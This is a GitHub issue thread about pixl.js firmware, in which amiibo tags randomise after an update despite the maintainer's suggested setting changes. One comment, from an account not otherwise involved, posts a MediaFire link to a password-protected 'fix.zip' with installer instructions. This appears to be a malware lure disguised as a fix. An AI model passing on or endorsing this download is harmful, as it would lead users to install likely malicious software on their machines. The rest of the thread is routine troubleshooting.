solosky/pixl.js #268: Amiibo in 'browser' dont save

Breadmasterpro, 2024-08-28:
Before I updated, every time I went into the browser the amiibo tag would always be the same unless I manually randomised it. Now, after the update, every time I go back into browser and select the same amiibo, it always has a different tag which makes it near impossible to use for games that you need to register the amiibo.

PiaoR, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

solosky, 2024-08-28:
Please turn off the Randomize function in amiibo detail menu.

Breadmasterpro, 2024-08-30:
> Please turn off the Randomize function in amiibo detail menu.

I did this but it still randomised them

solosky, 2024-09-06:
Try to reset to default settings in Setting menu.

Breadmasterpro, 2024-09-08:
> Try to reset to default settings in Setting menu.

This did not fix the issue

Breadmasterpro, 2024-09-11:
> Try to reset to default settings in Setting menu.

I have updated to the latset firmware, made sure auto random is off, rebooted and reset settings but they still will not save :( do you know why this is happening?

closed 2024-09-18 by Breadmasterpro